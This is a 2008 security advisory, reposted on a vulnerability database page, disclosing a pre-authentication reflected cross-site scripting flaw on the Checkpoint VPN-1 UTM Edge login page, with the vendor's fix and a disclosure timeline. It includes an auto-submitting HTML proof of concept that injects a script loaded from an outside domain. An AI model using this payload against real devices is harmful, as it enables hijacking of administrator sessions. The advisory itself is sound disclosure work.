Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19357
HistoryMar 09, 2008 - 12:00 a.m.

Henri Lindberg - Smilehouse Oy

2008-03-0900:00:00
vulners.com
27
JSON
                       Louhi Networks
                      Security Advisory


  Advisory: Checkpoint VPN-1 UTM Edge cross-site scripting

Release Date: 2008/03/06
Last Modified: 2008/03/06
Authors: Henri Lindberg, Associate of (ISC)²
[[email protected]]

Application: Checkpoint VPN-1 Edge W Embedded NGX 7.0.48x
(patched in version 7.5.48)
Devices: Checkpoint VPN-1 UTM Edge
Attack type: Cross site scripting (non-persistent)
Risk: Low
Vendor Status: Vendor has released an updated version
References: http://www.louhi.fi/advisory/checkpoint_080306.txt

Overview:

Quote from http://www.checkpoint.com/
"VPN-1 UTM Edge appliances deliver unified threat management to
 enterprises with branch offices and simplify security deployments
 and manageability. VPN-1 UTM Edge appliances consolidate proven
 enterprise-class technology into a single branch office solution
 that does not compromise the corporate network and eliminates the
 branch office as your weakest link. As part of Check Point's Unified
 Security Architecture, VPN-1 UTM Edge can enforce a global security
 policy and allows administrators to manage and update thousands of
 appliances as easily as managing one."

Insufficient input validation and output encoding on the login page
allows attacker to perform html-injection by posting suitable string
to the login form handler. The injection leads to reflected
pre-authentication cross site scripting.

Details:
Form based authentication is used only when device is accessed using
HTTP. Authentication over HTTPS uses HTTP basic authentication.

The device does not accept the parameters in a GET request, POST
request has to be used instead - exploiting the XSS vulnerability
requires therefore a bit more effort compared to ordinary GET based
reflected cross site scripting vulnerability.

The current version can be checked from
http://xxx.xxx.xxx.xxx/pub/test.html where xxx.xxx.xxx.xxx is LAN IP
address of the device. The page also displays current product key.

Vendor response:

"Once users register the appliance and connect to the service center
(Safe@Office appliances), the latest firmware is automatically
downloaded to their appliance. For UTM-1 Edge appliances, the latest
firmware version can be downloaded from the Check Point download
center. Currently, this is version 7.5.48 that does not contain the
reported issue. We believe that customers are not exposed to this
issue."

Proof of Concept:

<html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1"
style="display:none">

<input name="user" value="'&lt;script/src=//l7.fi&gt;&lt;/script&gt;">

</form>
</body>
</html>

Solution:

Update to version 7.5.48

Disclosure Timeline:

19.  February 2008    - Contacted Checkpoint by email
20.  February 2008    - Vendor response.
6.      March 2008    - Advisory was released

Copyright 2008 Louhi Networks Oy. All rights reserved.

JSON